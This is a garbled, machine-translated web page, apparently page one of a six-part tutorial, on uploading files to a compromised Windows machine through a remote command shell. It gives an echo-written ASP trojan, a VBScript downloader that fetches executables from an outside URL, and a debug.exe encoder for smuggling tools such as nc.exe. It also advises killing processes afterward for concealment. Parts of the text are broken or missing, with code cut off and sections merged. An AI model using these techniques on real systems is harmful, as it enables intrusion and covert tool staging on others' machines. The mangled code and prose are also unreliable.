Do all in CMD shell everything under the command line complete 1th/6 page _dos/bat

Source: Internet
Author: User
Tags echo command
File transfer
The biggest problem with the CMD shell that is getting the overflow is how to upload the file. Due to the worm's popularity, the 139 or 445 ports required to connect ipc$ are routed and blocked. Coupled with the WinXP system to enhance the protection of the ipc$, through the ipc$ and default sharing of the means of uploading files is basically ineffective. FTP and TFTP are two feasible methods, between it has been well-known, this article is not introduced. There are three kinds of familiar ways, as a summary I mention again:

1, using echo command to write ASP Trojan.
The premise is, of course, that IIS is already installed on the target host.
The General ASP Trojan "volume" larger, not suitable for direct use of the echo command to write files, here I provide a compact.
Give the echo version directly:

@echo ^ >up.asp

Note that there is only one row and there is no carriage return in the middle.
The generated up.asp cannot be accessed by the browser, only the following script:

With WScript
If. Arguments.count>dl.vbs
@echo W.open "Get",. Arguments (0), 0:w.send:if w.status^>200 then. echo "Error:" +w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile. Arguments (1), 2:end with >>dl.vbs

For example-download Ps.exe and save to C:\Path:

cscript dl.vbs Http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this is performed in a remote shell.

4,echo any files that are encoded, and then restore them with a script +debug.
The previous two methods do not guarantee a pass through the firewall. And, unless you own a Web server, general Web resources are provided in the form of compressed files. If the target host does not have the decompression tool, still does not have the means. Then only the "killer"!

The echo command adds a directional x to a character that has an ASCII code less than 128, but is greater than or equal to 128. You can easily write to a remote host only if you re "encode" the local file as a character that can be displayed. The first thing you can think of is Base64 code, the encoding of an email attachment. However, the VBS does not support bit X, so coding and decoding are more complex. More troubling, the script's ability to process files in binary streams is poor. (ADODB.stream can write files in streams, but I can't construct the corresponding data type.) Binary data streams can be turned into strings using the MIDB function, but not in the reverse. It took me two days to solve the problem. If anyone can use VBS or JS to write any byte data to the file, please enlighten me. )

Helpless only please debug.exe. Principle many people know, I do not introduce, directly give results-coding script:

Fp=wscript.arguments (0)
Fn=right (Fp,len (FP)-instrrev (FP, "\"))
With CreateObject ("ADODB.stream")
. Type=1:.open:.loadfromfile Fp:str=.read:sl=lenb (str)
End With
SLL=SL MoD 65536:slh=sl\65536
With CreateObject ("Scripting.FileSystemObject"). OpenTextFile (fp& ". bat", 2,true)
. Write "@echo str=" "" "
For I=1 to SL
BT=ASCB (MidB (str,i,1))
If Bt>debug.vbs "+vbcrlf+" @echo + "" "
Next
. WriteLine "" ">>debug.vbs" +vbcrlf+ "@echo with Wscript.stdout:r=vbcrlf" _
+ ": For I=1 to Len (str) Step 48:.write" E "" +hex (256+ (i-1)/2) "_
+ ": For J=i to i+46 step 2:.write" "+mid (str,j,2): Next:.write r:next>>debug.vbs"
. WriteLine "@echo. Write" "RBX" "+r+" "+hex (SLH) +" "+r+" "RCX" "+r+" "" +hex (SLL) _
+ "" "+r+" "N debug.tmp" "+r+" "W" "+r+" "Q" "+r:end with" _
+ ">>debug.vbs&&cscript//nologo debug.vbs|debug.exe>nul&&ren debug.tmp" "&fn&" "" &del Debug.vbs "
End With

Save it as a echo.vbs. If you want to upload Nc.exe, enter the command at the local command line:

cscript Echo.vbs Nc.exe

You can also drag and drop the icon for the file you want to transfer to the icon on the script file.
Wait a moment, and a nc.exe.bat will be generated in the current directory. Open it with an editing tool such as Notepad, and you can see the following:

@echo str= " 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008 00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24 00000000000000 "_>>debug.vbs
@echo + " 504500004c010400b98eae340000000000000000e0000f010b010500009800000062000000000000004c00000010000000b0000000004000001000000 0020000040000000000000004000000000000000030010000040000000000000300000000001000001000000000100000100000000000001000000000 00000000000000 "_>>debug.vbs
@echo + " 002001003c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000a0210100640100000000000000000000000000000000000000000000000000002e 74657874000000 "_>>debug.vbs
@echo + " 70970000001000000098000000040000000000000000000000000000200000602e726461746100001704000000b0000000060000009c0000000000000 000000000000000400000402e646174610000004452000000c00000003e000000a20000000000000000000000000000400000c02e696461746100005c 07000000200100 "_>>debug.vbs
............
............ (Omit several lines)
............
@echo + "" >>debug.vbs
@echo with Wscript.stdout:r=vbcrlf:for I=1 to Len (str) Step 48:.write "E" +hex (256+ (i-1)/2): For j=i to i+46 step 2:.write " "+mid (str,j,2): Next:.write r:next>>debug.vbs
@echo. Write "RBX" +r+ "0" +r+ "RCX" +r+ "E800" +r+ "n debug.tmp" +r+ "W" +r+ "Q" +r:end With>>debug.vbs&&cscript Nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC. EXE "&del Debug.vbs

Select All-"copy"-"Switch to remote command line window-" paste.
If the speed is not very slow, the entire upload process takes approximately 20 seconds.

A few notes:
1, the large file transmission instability, may cause the shell to die. So the smaller the file effect the better. It is recommended that the original document not exceed 100KB.
2, before the transfer of large files, you can first send a small file as a "warm-up", so that 16-bit virtual machine Ntvdm.exe resident backstage. After all the documents have been passed, the NTVDM process should be killed for the sake of concealment.
3, some cmd shell each command needs to attach two return, that Nc.exe.bat can not be used directly.
4, the length of a single command is limited, so it is not possible to complete all tasks with just one echo. Also, for the CMD shell provided by NC, a slightly longer command would cause the shell to automatically exit (overflow?). )。 You can modify the 128 in the "I mod 128=0" statement to adjust the length of each echo command. Each time the echo character is multiplied by 2 for this number.
5, the decoding process is also possible without script participation. The purpose of using scripts is to reduce the amount of data that is transferred (because data is compressed). If there is time, I will write a better script to enhance the data compression capabilities, increase data validation capabilities.

Can upload files Of course everything is OK, but a lot of X action windows with tools more convenient. When you look everywhere for the tools you need, don't forget about Windows itself.
Current 1/6 page 123456 Next read the full text
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.